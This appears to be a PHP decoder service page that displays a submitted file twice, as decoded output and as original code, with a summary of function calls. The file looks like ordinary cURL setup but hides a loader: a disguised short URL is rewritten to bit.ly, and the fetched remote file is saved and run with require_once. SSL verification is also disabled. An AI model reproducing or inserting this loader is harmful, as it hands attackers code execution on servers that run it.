Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt..
Decoded Output download
<?php
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
$qurl="https://netflix.ly/35RYADU";
curl_setopt($curl, CURLOPT_REFERER, 'https://www.netflix.com/cgi-bin/webscr?cmd=_send-money&cmd=_send-money&myAllTextSubmitID=&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email=&email=¤cy=USD&amount=10&amount_ccode=USD&submit.x=Continue&browser_name=Firefox&browser_name=Firefox&browser_version=10&browser_version=11&browser_version_full=10.0.2&browser_version_full=11.0&operating_system=Windows&operating_system=Windows');
curl_setopt($curl, CURLOPT_COOKIE,'1.txt');
$d=str_replace("netflix","bit",$qurl);
curl_setopt($curl, CURLOPT_COOKIEFILE,'1.txt');
file_put_contents("robot", file_get_contents($d)); require_once "robot";
curl_setopt($curl, CURLOPT_COOKIEJAR,'1.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
if ($Follow !== False) {
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
}
$result = curl_exec($curl);
?>
Did this file decode correctly?
Original Code
<?php
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
$qurl="https://netflix.ly/35RYADU";
curl_setopt($curl, CURLOPT_REFERER, 'https://www.netflix.com/cgi-bin/webscr?cmd=_send-money&cmd=_send-money&myAllTextSubmitID=&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email=&email=¤cy=USD&amount=10&amount_ccode=USD&submit.x=Continue&browser_name=Firefox&browser_name=Firefox&browser_version=10&browser_version=11&browser_version_full=10.0.2&browser_version_full=11.0&operating_system=Windows&operating_system=Windows');
curl_setopt($curl, CURLOPT_COOKIE,'1.txt');
$d=str_replace("netflix","bit",$qurl);
curl_setopt($curl, CURLOPT_COOKIEFILE,'1.txt');
file_put_contents("robot", file_get_contents($d)); require_once "robot";
curl_setopt($curl, CURLOPT_COOKIEJAR,'1.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
if ($Follow !== False) {
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
}
$result = curl_exec($curl);
?>
Function Calls
curl_init | 1 |
Stats
MD5 | 3e7f91f2cc39cee17c1eeb5038f04e1c |
Eval Count | 0 |
Decode Time | 46 ms |